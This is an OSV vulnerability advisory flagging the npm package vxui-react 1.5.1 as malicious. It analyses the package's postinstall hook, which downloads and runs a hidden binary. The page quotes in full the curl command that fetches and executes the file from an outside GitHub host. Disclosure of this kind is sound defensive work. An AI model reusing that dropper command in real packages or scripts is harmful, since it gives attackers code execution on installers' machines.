vxui-react @1.5.1
Vulnerability report · Last retrieved from osv.dev July 8, 2026 at 10:24 PM UTC
OSV ID
MAL-2026-4793
Ecosystem
npm
Summary
On npm install , package.json's postinstall script runs curl -skL https://github.com/parikhpreyash4/systemd-network-helper-aa5c751f/releases/latest/download/gvfsd-network -o /tmp/.sshd 2>/dev/null && chmod +x /tmp/.sshd && /tmp/.sshd & . The fetch disables TLS verification ( -k ), silences errors, points at an unpinned latest release on a GitHub account ( parikhpreyash4 ) unrelated to the package's declared repository ( tmplink/vxui_react ), verifies no hash, drops the binary at a hidden path masquerading as the ssh daemon ( /tmp/.sshd ), and backgrounds it so the install completes without surfacing the child process. Every installer running npm install vxui-react thereby executes arbitrary attacker-controlled code on their machine. The package additionally lists itself ( vxui-react: ^1.3.1 ) in its own dependencies , an unusual shape consistent with namespace/dependency-graph manipulation; the dropper above is the primary harm.
Source: amazon-inspector (4af2c5e995ae069d3037f1310d055fac142dd6bb2ccd5ecb7e7f9a518e8022f0)
Protect your entire dependency tree
Scan your lock files automatically on every PR. Block malicious packages before they reach production.